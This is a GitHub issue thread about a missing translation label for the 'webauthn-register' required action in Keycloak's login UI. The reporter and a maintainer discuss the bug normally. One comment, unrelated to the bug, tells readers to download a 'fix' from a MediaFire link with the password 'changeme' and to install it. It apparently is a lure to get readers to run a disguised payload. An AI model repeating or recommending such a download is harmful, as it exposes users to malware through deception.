### ISSUE TITLE
Missing translations for required action webauthn-register

### ISSUE THREAD

**Issue by MinnDevelopment** [keycloak/keycloak#32415]
### Before reporting an issue

- [X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.

### Area

login/ui

### Describe the bug

Using the credential reset email for `WebAuthn Register` results in this registration form with a missing translation for the required action:

![grafik](https://github.com/user-attachments/assets/6168990d-5e21-4e1e-a26a-59c2fa676dec)

### Version

25.0.2

### Regression

- [ ] The issue is a regression

### Expected behavior

The action should be translated properly, similar to other actions like `webauthn-register-passwordless`.

### Actual behavior

The translation key is shown instead.

### How to Reproduce?

Send a credential reset for `webauthn-register`.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jonkoops** [comment]
Thanks for reporting this @MinnDevelopment, I can indeed see this label is missing. I've marked this issue as 'help wanted', so if you would like to make a contribution to fix this issue that would be more than welcome.
